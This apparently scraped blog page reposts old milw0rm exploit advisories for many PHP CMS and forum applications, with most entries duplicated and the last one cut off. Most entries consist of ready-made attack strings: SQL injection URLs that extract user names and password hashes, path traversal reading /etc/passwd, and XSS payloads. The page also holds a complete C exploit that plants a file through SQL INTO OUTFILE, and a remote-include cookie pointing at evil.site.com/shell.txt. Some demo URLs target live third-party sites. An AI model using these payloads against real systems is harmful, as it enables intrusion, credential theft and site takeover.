PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability
Author: elusiven from Poland
Contact: elusivenpl@gmail.com
Greetings: Fusi0n Group
Exploit:
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users--
http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users--
# milw0rm
Showing posts with label webapps. Show all posts
Showing posts with label webapps. Show all posts
phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities
Application: phpCommunity 2
Version: 2.1.8
Website: http://sourceforge.net/projects/phpcommunity2/
Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view username and
password of a registered user.
- [B] Directory Traversal
Requisites: none
File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directory on the web server.
- [C] Reflected XSS
Requisites: none
File affected: templates/1/login.php
Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg= script alert('XSS'); /script
Fix
No fix.
# milw0rm
Version: 2.1.8
Website: http://sourceforge.net/projects/phpcommunity2/
Bugs: [A] Multiple SQL Injection
[B] Directory Traversal
[C] Reflected XSS
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
This web application presents several vulnerabilities
which can be exploited to obtain reserved information.
The following are examples of vulnerabilities
discovered in this application.
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: module/forum/class_forum.php
module/forum/class_search.php
This bug allows a guest to view username and
password of a registered user.
- [B] Directory Traversal
Requisites: none
File affected: module/admin/files/show_file.php,
module/admin/files/show_source.php
This bug allows a guest to read arbitrary files and
directory on the web server.
- [C] Reflected XSS
Requisites: none
File affected: templates/1/login.php
Code
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=id&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=nick&wert=-1%25" UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=search&s=forum&wert=-1%25" UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23
- [B] Directory Traversal
http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd
http://www.site.com/path/module/admin/files/show_source.php?path=/etc
- [C] Reflected XSS
http://www.site.com/path/templates/1/login.php?msg= script alert('XSS'); /script
Fix
No fix.
# milw0rm
CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability
CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete
Exploit:
http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
# milw0rm
Provider: www.cs-cart.com
Discovered by netsoul
Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
Contact: netsoul2[at]gmail.com
ALTO PARANA - PARAGUAY
Ñane mba'e teete
Exploit:
http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
# milw0rm
Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities
Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities
by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770
Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
BBCode IMG Tag Script Injection
[img]http://[host][/img]
Delete Private Messages (BBCode IMG Tag Script Injection)
Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.
Cross Site Scripting
http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
you can bypass the magic_quotes_gpc with String.FromCharCode function.
URL Redirection
http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
Full Path Discloscure
http://[host]/[path]/wbb/index.php?page=[]
it works on < 3.0.8 version only.
# milw0rm
by Juri Gianni aka yeat - staker[at]hotmail[dot]it
thanks to s3rg3770
Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
BBCode IMG Tag Script Injection
[img]http://[host][/img]
Delete Private Messages (BBCode IMG Tag Script Injection)
Insert into a (forum message/private message/your signature) the code below:
[img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
The fake image doesn't show errors.
Cross Site Scripting
http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
you can bypass the magic_quotes_gpc with String.FromCharCode function.
URL Redirection
http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
Full Path Discloscure
http://[host]/[path]/wbb/index.php?page=[]
it works on < 3.0.8 version only.
# milw0rm
PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability
PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability
Discovered By d3b4g
script: http://phprecipebook.sourceforge.net/demo/phprecipebook/
Greetz : str0ke | Inerd | & friends
Follow me on twitter www.twitter.com/schaba
About:
PHPRecipeBook is a Web-based cookbook with the
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited.
The shopping list also attempts to combine similar items
so that duplication does not occur.
/* start
0x1
Proof of concept
-------------------------------------
Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
/* end
From Tiny Little island of Maldivies
# milw0rm
Discovered By d3b4g
script: http://phprecipebook.sourceforge.net/demo/phprecipebook/
Greetz : str0ke | Inerd | & friends
Follow me on twitter www.twitter.com/schaba
About:
PHPRecipeBook is a Web-based cookbook with the
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited.
The shopping list also attempts to combine similar items
so that duplication does not occur.
/* start
0x1
Proof of concept
-------------------------------------
Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
/* end
From Tiny Little island of Maldivies
# milw0rm
PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit
#include
#include
#include
#include
#include
#include
/* Dork "Powered by PHP Director 0.2"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| PHP Director 0.2.1 (sql into outfile) eval() Injection Exploit |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
{Exploit}-> index.php?cat=%27+UNION+SELECT+1,'lol',3,4,5,6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'/var/www/ex.php'/*
{PHP.ini}-> Magic Quotes off
{Written}-> by Juri Gianni aka yeat - staker[at]hotmail[dot]it
{WhereIs}-> http://sourceforge.net/projects/phpdirector/
{Compile}-> gcc -o exploit exploit.c
{Details}-> index.php (line 56-58)
56. }elseif (isset($_GET["cat"])) {
57. $cat = $_GET["cat"];
58. $_query = sprintf("SELECT SQL_CALC_FOUND_ROWS * FROM pp_files WHERE `category` = '$cat etc..)
{Bug}-> $cat variable is not checked so we have a sql injection
{Fix}-> $cat = mysql_real_escape_string($_GET['cat']);
yeat@lulz:~/Desktop$ gcc -o exploit exploit.c
yeat@lulz:~/Desktop$ ./exploit localhost /cms /var/www/shell.php
Exploit successful..shell: /var/www/shell.php
*/
#define GET "GET %s/index.php?cat=%s HTTP/1.1\r\n" \
"Host: %s\r\n" \
"User-Agent: Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)\r\n" \
"Connection: close\r\n\r\n"
#define Exec "'+UNION+SELECT+1,2,3,4,''"\
",6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'%s'"
char *getHost (char *host)
{
struct hostent *hp;
struct in_addr **y;
hp = gethostbyname(host);
y = (struct in_addr **)hp->h_addr_list;
return inet_ntoa(**y);
}
int main (int argc,char **argv)
{
int server,leak;
char data[1024],html[1024];
char packet[500],loadsf[500];
struct sockaddr_in addr;
if (argc < 3) {
printf("Usage: %s host path file\n",argv[0]);
printf("RunEx: %s localhost /cms /var/www/shell.php\n",argv[0]);
exit(0);
}
server = socket(AF_INET,SOCK_STREAM,0);
addr.sin_family = AF_INET;
addr.sin_port = htons((int)80);
addr.sin_addr.s_addr = inet_addr(getHost(argv[1]));
leak = connect(server,(struct sockaddr*)&addr,sizeof(addr));
if (leak < 0) {
printf("connection refused..try again\n");
exit(0);
}
snprintf(loadsf,sizeof(loadsf),Exec,argv[3]);
strncat(loadsf,"%23",sizeof(loadsf));
snprintf(packet,sizeof(packet),GET,argv[2],loadsf,argv[1]);
if (send(server,packet,sizeof(packet),0) < 0) {
printf("data sent error..\n");
}
while(recv(server,html,sizeof(html),0) > 0)
{
if (strstr(html,"MySQL") || strstr(html,"mysql_fetch_array")) {
printf("Exploit unsuccessful..\n"); break;
}
else {
printf("Exploit successful..shell: %s\n",argv[3]); break;
}
}
return 0;
}
#milw0rm
#include
#include
#include
#include
#include
/* Dork "Powered by PHP Director 0.2"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| PHP Director 0.2.1 (sql into outfile) eval() Injection Exploit |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
{Exploit}-> index.php?cat=%27+UNION+SELECT+1,'lol',3,4,5,6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'/var/www/ex.php'/*
{PHP.ini}-> Magic Quotes off
{Written}-> by Juri Gianni aka yeat - staker[at]hotmail[dot]it
{WhereIs}-> http://sourceforge.net/projects/phpdirector/
{Compile}-> gcc -o exploit exploit.c
{Details}-> index.php (line 56-58)
56. }elseif (isset($_GET["cat"])) {
57. $cat = $_GET["cat"];
58. $_query = sprintf("SELECT SQL_CALC_FOUND_ROWS * FROM pp_files WHERE `category` = '$cat etc..)
{Bug}-> $cat variable is not checked so we have a sql injection
{Fix}-> $cat = mysql_real_escape_string($_GET['cat']);
yeat@lulz:~/Desktop$ gcc -o exploit exploit.c
yeat@lulz:~/Desktop$ ./exploit localhost /cms /var/www/shell.php
Exploit successful..shell: /var/www/shell.php
*/
#define GET "GET %s/index.php?cat=%s HTTP/1.1\r\n" \
"Host: %s\r\n" \
"User-Agent: Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)\r\n" \
"Connection: close\r\n\r\n"
#define Exec "'+UNION+SELECT+1,2,3,4,''"\
",6,7,8,9,10,11,12,13,14,15+INTO+OUTFILE+'%s'"
char *getHost (char *host)
{
struct hostent *hp;
struct in_addr **y;
hp = gethostbyname(host);
y = (struct in_addr **)hp->h_addr_list;
return inet_ntoa(**y);
}
int main (int argc,char **argv)
{
int server,leak;
char data[1024],html[1024];
char packet[500],loadsf[500];
struct sockaddr_in addr;
if (argc < 3) {
printf("Usage: %s host path file\n",argv[0]);
printf("RunEx: %s localhost /cms /var/www/shell.php\n",argv[0]);
exit(0);
}
server = socket(AF_INET,SOCK_STREAM,0);
addr.sin_family = AF_INET;
addr.sin_port = htons((int)80);
addr.sin_addr.s_addr = inet_addr(getHost(argv[1]));
leak = connect(server,(struct sockaddr*)&addr,sizeof(addr));
if (leak < 0) {
printf("connection refused..try again\n");
exit(0);
}
snprintf(loadsf,sizeof(loadsf),Exec,argv[3]);
strncat(loadsf,"%23",sizeof(loadsf));
snprintf(packet,sizeof(packet),GET,argv[2],loadsf,argv[1]);
if (send(server,packet,sizeof(packet),0) < 0) {
printf("data sent error..\n");
}
while(recv(server,html,sizeof(html),0) > 0)
{
if (strstr(html,"MySQL") || strstr(html,"mysql_fetch_array")) {
printf("Exploit unsuccessful..\n"); break;
}
else {
printf("Exploit successful..shell: %s\n",argv[3]); break;
}
}
return 0;
}
#milw0rm
Blogsa <= 1.0 Beta 3 XSS Vulnerability
Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability Software Site: blogsa.net Discovered by: Onur YILMAZ aka DJR Blog: http://www.onuryilmaz.info E-mail: contactonuryilmazinfo
XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText= script alert(document.cookie) /script
Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText= script alert(document.cookie) /script
Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
CMS S.Builder <= 3.7 Remote File Inclusion Vulnerability
CMS S.Builder <= 3.7 RFI Vulnerability
Information:
Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions
Description:
The engine of this cms makes site files (index.php, etc) with code like:
PHP Code:
if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...
If register_globals=On, attacker can write remote url (if allow_url_fopen=On) or local path into variable binn_include_path.
PoC:
HTTP Request:
GET /index.php HTTP/1.1
Host: www.site.com
Cookie: binn_include_path=http://evil.site.com/shell.txt?
# by cr0w
# http://cr0w-at.blogspot.com
# milw0rm
Information:
Vendor: http://www.sbuilder.ru
Affected versions: 3.7 and possibly later versions
Description:
The engine of this cms makes site files (index.php, etc) with code like:
PHP Code:
if (!isset($GLOBALS['binn_include_path'])) $GLOBALS['binn_include_path'] = '';
...
include_once($GLOBALS['binn_include_path'].'prog/pl_menu/show_menu.php');
...
If register_globals=On, attacker can write remote url (if allow_url_fopen=On) or local path into variable binn_include_path.
PoC:
HTTP Request:
GET /index.php HTTP/1.1
Host: www.site.com
Cookie: binn_include_path=http://evil.site.com/shell.txt?
# by cr0w
# http://cr0w-at.blogspot.com
# milw0rm
nForum 1.5 Multiple Remote SQL Injection Vulnerabilities
Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/
Bugs: [A] Multiple SQL Injection
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php
These bugs allows a guest to view username and
the password of a registered user.
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
Fix
No fix.
# milw0rm
Version: 1.5
Website: http://sourceforge.net/projects/nforum/
Bugs: [A] Multiple SQL Injection
Exploitation: Remote
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php
These bugs allows a guest to view username and
the password of a registered user.
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
Fix
No fix.
# milw0rm
UMI.CMS Cross-Site Scripting vulnerability
Affected Software
UMI.CMS
Versions 2.x prior to 2.7.1 (build 10856)
Product Link:
http://www.umi-cms.ru
Severity Rating
Severity: Medium
Impact: Cross-Site Scripting
Attack Vector: Remote
CVSS v2:
Base Score: 4.3
Temporal Score: 3.4
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C)
CVE: not assigned
Software Description
UMI.CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).
Vulnerability Description
Positive Technologies Research Team has discovered a Cross-Site Scripting (XSS) vulnerability in UMI.CMS.
User input passed to the "fields_filter" setting is not properly sanitized. This can be exploited to inject malicious code and allows to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Example:
http://[server]/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool users in order to gather data from their machines. An attacker can steal the session cookie and take over the account impersonating the user. It is also possible to modify page content presented to the user.
Solution
Update to version 2.7.1 (build 10856).
Disclosure Timeline
04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
06/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure
Credits
This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.
References
http://en.securitylab.ru/lab/PT-2009-12
http://www.ptsecurity.ru/advisory.asp
Complete list of vulnerability reports published by Positive Technologies Research Team:
http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp
UMI.CMS
Versions 2.x prior to 2.7.1 (build 10856)
Product Link:
http://www.umi-cms.ru
Severity Rating
Severity: Medium
Impact: Cross-Site Scripting
Attack Vector: Remote
CVSS v2:
Base Score: 4.3
Temporal Score: 3.4
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N/E:P/RL:O/RC:C)
CVE: not assigned
Software Description
UMI.CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).
Vulnerability Description
Positive Technologies Research Team has discovered a Cross-Site Scripting (XSS) vulnerability in UMI.CMS.
User input passed to the "fields_filter" setting is not properly sanitized. This can be exploited to inject malicious code and allows to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Example:
http://[server]/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&fields_filter[price][1]=1
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool users in order to gather data from their machines. An attacker can steal the session cookie and take over the account impersonating the user. It is also possible to modify page content presented to the user.
Solution
Update to version 2.7.1 (build 10856).
Disclosure Timeline
04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
06/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure
Credits
This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.
References
http://en.securitylab.ru/lab/PT-2009-12
http://www.ptsecurity.ru/advisory.asp
Complete list of vulnerability reports published by Positive Technologies Research Team:
http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp
TinX CMS 3.x SQL Injection Vulnerability
TinX CMS SQL Injection vulnerability
Affected Software
TinX CMS
Versions 3.x prior to 3.5.1
Product Link:
http://sourceforge.net/project/showfiles.php?group_id=133415
Severity Rating
Severity: High
Impact: SQL Injection
Attack Vector: Remote
CVSS v2:
Base Score: 7.5
Temporal Score: 5.9
Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P/E:P/RL:O/RC:C)
CVE: CVE-2009-0825
Software Description
TinX CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).
Vulnerability Description
Positive Technologies Research Team has discovered a SQL Injection vulnerability in TinX CMS.
User input passed to the "id" parameter is not properly sanitized. This can allows remote attackers to execute arbitrary SQL commands via the "id" parameter.
Example:
http://[server]/system/rss.php?id=1'SQL-code
SQL injection is an attack technique that can be used to extract, modify, add or delete information from database servers that are used by vulnerable web applications. SQL injection vulnerabilities are caused by an unsecured programming technique that allows client-supplied data to interfere with the syntax of SQL queries. SQL is a programming language that is used by applications to communicate with database systems.
Solution
Update to version 3.5.1.
Disclosure Timeline
04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
05/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure
Credits
This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.
References
http://en.securitylab.ru/lab/PT-2009-13
http://www.ptsecurity.ru/advisory.asp
Complete list of vulnerability reports published by Positive Technologies Research Team:
http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp
Affected Software
TinX CMS
Versions 3.x prior to 3.5.1
Product Link:
http://sourceforge.net/project/showfiles.php?group_id=133415
Severity Rating
Severity: High
Impact: SQL Injection
Attack Vector: Remote
CVSS v2:
Base Score: 7.5
Temporal Score: 5.9
Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P/E:P/RL:O/RC:C)
CVE: CVE-2009-0825
Software Description
TinX CMS is a content management system (CMS) software, usually implemented as a Web application, for creating and managing HTML content. It is used to manage and control a large, dynamic collection of Web material (HTML documents and their associated images).
Vulnerability Description
Positive Technologies Research Team has discovered a SQL Injection vulnerability in TinX CMS.
User input passed to the "id" parameter is not properly sanitized. This can allows remote attackers to execute arbitrary SQL commands via the "id" parameter.
Example:
http://[server]/system/rss.php?id=1'SQL-code
SQL injection is an attack technique that can be used to extract, modify, add or delete information from database servers that are used by vulnerable web applications. SQL injection vulnerabilities are caused by an unsecured programming technique that allows client-supplied data to interfere with the syntax of SQL queries. SQL is a programming language that is used by applications to communicate with database systems.
Solution
Update to version 3.5.1.
Disclosure Timeline
04/03/2009 - Vendor is notified
04/03/2009 - Vendor response
04/03/2009 - Requested status update from vendor
05/03/2009 - Vendor releases fixed version and details
06/03/2009 - Public disclosure
Credits
This vulnerability was discovered by Dmitriy Evteev (Positive Technologies Research Team) using professional network security scanner MaxPatrol.
References
http://en.securitylab.ru/lab/PT-2009-13
http://www.ptsecurity.ru/advisory.asp
Complete list of vulnerability reports published by Positive Technologies Research Team:
http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp
nForum 1.5 Multiple SQL Injection
Application: nForum
Version: 1.5
Website: http://sourceforge.net/projects/nforum/
Bugs: [A] Multiple SQL Injection
Exploitation: Remote
Date: 06 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php
These bugs allows a guest to view username and
the password of a registered user.
Code
- [A] Multiple SQL Injection
http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT
1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
Fix
No fix.
Version: 1.5
Website: http://sourceforge.net/projects/nforum/
Bugs: [A] Multiple SQL Injection
Exploitation: Remote
Date: 06 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
Contact: e-mail: drosophilaxxx@gmail.com
Menu
1) Bugs
2) Code
3) Fix
Bugs
- [A] Multiple SQL Injection
Requisites: magic_quotes_gpc = off
File affected: showtheme.php, userinfo.php
These bugs allows a guest to view username and
the password of a registered user.
Code
- [A] Multiple SQL Injection
http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT
1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23
http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT
1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
Fix
No fix.
OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability
OneOrZero Helpdesk <= 1.6.5.7 Local File Inclusion Vulnerability
Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads
[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd
Bug: ./oozv1657/common/login.php (line: 104)
require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
Script: "OneOrZero Helpdesk and Task Management System is a powerful enterprise helpdesk system
used by companies and groups large and small to manage information and requests in their organization. "
Script site: http://www.oneorzero.com/
Download: http://www.oneorzero.com/index.php?controller=main_general&option=main_downloads
[LFI] Vuln: http://site.com/oozv1657/common/login.php?default_language=../../../../../../../../../../etc/passwd
Bug: ./oozv1657/common/login.php (line: 104)
require_once "../common/common.php";
if (eregi("supporter", $_SERVER[PHP_SELF]) || eregi("admin", $_SERVER[PHP_SELF]))
require_once "../lang/$default_language.lang.php";
else
require_once "lang/$default_language.lang.php"; // LFI (register_globals = On, magic_quotes_gpc = Off)
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
isiAJAX v1 (praises.php id) Remote SQL Injection Vulnerability
Script site: http://isiajax.sourceforge.net/
Download: http://sourceforge.net/project/showfiles.php?group_id=169754
[SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()--
http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios--
Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14)
$paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); //
while ($paises = mysql_fetch_row($paise)) { // SQL inj.
?> //
}
Greetz: D3m0n_DE * str0ke * and otherz..
[ dun / 2009 ]
# milw0rm
Download: http://sourceforge.net/project/showfiles.php?group_id=169754
[SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()--
